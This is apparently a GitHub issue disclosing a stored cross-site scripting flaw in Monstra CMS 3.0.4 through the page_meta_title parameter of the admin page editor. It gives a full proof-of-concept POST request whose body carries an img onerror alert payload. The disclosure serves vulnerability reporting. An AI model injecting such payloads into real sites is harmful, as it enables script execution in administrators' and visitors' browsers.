Skip to content

Stored XSS in Monstra CMS 3.0.4 #458

Open
Open
Stored XSS in Monstra CMS 3.0.4#458
@PrincyEdward

Description

@PrincyEdward
PrincyEdward
opened on Sep 12, 2018

Monstra - Version 3.0.4

Exploit URI :
http://localhost/path/admin/index.php?id=pages&action=add_page
http://localhost/path/admin/index.php?id=pages&action=edit_page&name=

Parameter -> page_meta_title

POC:

POST /path/admin/index.php?id=pages&action=edit_page&name=aaaa HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/path/admin/index.php?id=pages&action=edit_page&name=aaaa
Content-Type: application/x-www-form-urlencoded
Content-Length: 460
Cookie: admin_username=admin; PHPSESSID=68m15vretbrdhhfa2ac19nqe17;
Connection: close
Upgrade-Insecure-Requests: 1

csrf=8a49185957df40c6b8bb8b3595663dedc3ffcb19&page_old_name=aaaa&old_parent=home&page_id=5&page_title=sample&page_name=sample&page_meta_title=prince%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&page_keywords=&page_description=&pages=home&templates=index&status=published&access=public&editor=&page_tags=&edit_page_and_exit=Save+and+Exit&page_date=2018-09-12+16%3A34%3A54

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Fields

    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions